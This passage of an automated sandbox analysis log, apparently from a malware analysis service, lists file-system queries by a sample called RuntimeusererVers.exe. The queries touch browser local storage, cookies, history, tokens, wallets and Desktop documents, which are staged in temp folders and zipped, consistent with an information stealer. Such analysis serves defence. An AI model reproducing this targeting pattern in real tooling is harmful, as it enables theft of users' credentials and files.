                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Games VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\process_info.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers\Firefox\History.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers\Cookies.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\system_info.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\network_info.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Sessions VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Tokens VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Display (1).png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Display (1).png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\network_info.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\network_info.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\process_info.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\process_info.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\system_info.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\system_info.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\system_info.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers\Firefox VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers\Cookies.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers\Cookies.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers\Firefox VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers\Firefox\History.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers\Firefox\History.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers\Firefox\History.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Wallets VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\BJZFPPWAPT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\BNAGMGSPLO.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\BNAGMGSPLO.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\DUUDTUBZFW.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\DUUDTUBZFW.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\EEGWXUHVUG.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\EEGWXUHVUG.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\EEGWXUHVUG.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\EFOYFBOLXA.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\EIVQSAOTAQ.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\GRXZDKKVDB.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\KLIZUSIQEN.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\KLIZUSIQEN.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\KLIZUSIQEN.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\KLIZUSIQEN.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\KLIZUSIQEN.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\KLIZUSIQEN.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\PIVFAGEAAV.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\PIVFAGEAAV.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\PWCCAWLGRE.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SQSJKEBWDT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SQSJKEBWDT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SQSJKEBWDT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SQSJKEBWDT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\SQSJKEBWDT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SQSJKEBWDT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\SUAVTZKNFL.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\SUAVTZKNFL.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL.xlsx VolumeInformationJump to behavior
